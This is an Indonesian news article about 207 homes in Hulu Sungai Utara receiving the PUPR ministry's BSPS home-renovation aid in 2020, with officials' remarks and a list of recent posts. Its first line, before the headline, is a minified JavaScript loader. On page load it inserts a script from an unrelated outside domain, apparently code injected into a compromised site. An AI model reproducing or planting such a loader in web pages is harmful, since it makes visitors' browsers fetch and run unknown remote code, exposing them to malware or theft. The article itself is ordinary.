(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

207 Rumah di HSU Terima Bantuan Stimulan Bedah Rumah Kementerian PUPR


KANALKALIMANTAN.COM, AMUNTAI – Sebanyak 207 rumah warga di Kabupaten Hulu Sungai Utara (HSU) mendapatkan kucuran Bantuan Stimulan Perumahan Swadaya (BSPS) atau program bedah rumah di tahun 2020 dari Kementrian PUPR.

Hal ini dikemukakan Najeriansyah, Plt Kepala Dinas Perumahan Kawasan Pemukiman dan Lingkungan Hidup (Disperkim LH) Kabupaten HSU saat rapat koordiansi pelaksanaan bantuan swadaya dana alokasi perumahan di aula Disperkim LH HSU, Selasa (1/9/2020).

Sekadar diketahui, BSPS merupakan bantuan pemerintah dalam upaya membantu perumahan Masyarakat Berpenghasilan Rendah (MBR) dalam meningkatkan kualitas rumah dan pembangunan rumah yang lebih layak.

BSPS memiliki dua kategori yaitu, Peningkatan Kualitas Rumah Swadaya (PKRS) dan Pembangunan Rumah Baru Swadaya (PBRS).

“PKRS ditunjukan untuk memperbaiki rumah yang tidak layak huni sementara PBRS untuk pembanguan rumah baru pengganti rumah rusak total,” kata Najeri.

Lebih lanjut Najeriansyah mengatakan, bantuan yang diluncurkan dari pemerintah pusat ini untuk Kabupaten HSU ada 4 kecamatan 12 desa dengan jumlah rumah 207 buah.

“Untuk tahun 2020 ini ada di Amuntai Tengah, Sungai Pandan, Amuntai Selatan dan Banjang,” kata Najeri –biasa disapa-.

Target sasaran yang dituju adalah MBR dan tentunya rumah yang tidak layak huni, untuk program yaitu bantuan PKRS dengan alokasi dana diberikan senilai Rp 17,5 juta per rumah.

Untuk penerima bantuan beradasar hasil dari data Musyawarah Rencana Pembangunan (Musrembang)  tahun 2019 di setiap desa, kemudian ditindak lanjuti dengan verifikasi apakah benar berhak mendapatkan bantuan bedah rumah tersebut.

“Program ini membantu warga kita yang rumahnya tidak layak huni, diberi stimulus untuk direhab agar menjadi layak huni,” beber Najeri.

Sementara itu, Wakil Bupati HSU H Husairi Abdi mendapat kabar ini mengaku bersyukur dengan adanya bantuan bedah rumah dari pemerintah pusat.

“Ini salah usaha pemerintah dalam memberikan kualitas rumah layak huni bagi masyarakat yang kurang mampu,” katanya.

Wabup HSU berpesan kepada seluruh kepala desa dan camat yang bakal mendapatkan bantuan bedah rumah, memantau bantuan bedah rumah ini tepat sasaran.

“Banyak atau sedikit bantuan didapatkan kita menfaatkan  sebaik mungkin untuk kemaslahatan masyarakat,” tandasnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie

Al Ghifari

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

4 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

7 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

7 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

9 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

11 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

12 jam ago

This website uses cookies.